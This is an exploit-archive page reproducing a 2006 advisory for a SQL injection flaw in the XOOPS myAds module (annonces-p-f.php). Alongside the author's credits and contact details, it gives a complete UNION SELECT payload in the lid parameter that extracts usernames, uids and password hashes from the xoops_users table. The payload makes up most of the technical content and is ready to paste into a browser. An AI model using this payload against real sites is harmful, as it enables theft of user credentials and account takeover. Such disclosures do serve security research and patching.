XOOPS myAds Module (lid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XOOPS myAds Module (lid) Remote SQL Injection Vulnerability
# Published : 2006-06-28
# Author : KeyCoder
# Previous Title : BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit
# Next Title : Pearl For Mambo <= 1.6 Multiple Remote File Include Vulnerabilities

#######################################
# Xoops myAds module SQL-Injection
# Discovered: KeyCoder <Turkish Coder>
# Visit :     www.grisapka.org
# Contact:    keycoder@msn.com
# Thanx:      SecretlyX-BeLa
#######################################
---------------------------------------
# Details  :
# Xoops myAds module SQL-Injection Vulnerability
# Website : http://www.xoops.org/
# Vulnerable File : annonces-p-f.php
# PoC : http://host/path/modules/myAds/annonces-p-f.php?op=[SQL]
---------------------------------------

Vulnerability:

SQL-injection

http://www.site.com/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*

# www.Syue.com [2006-06-28]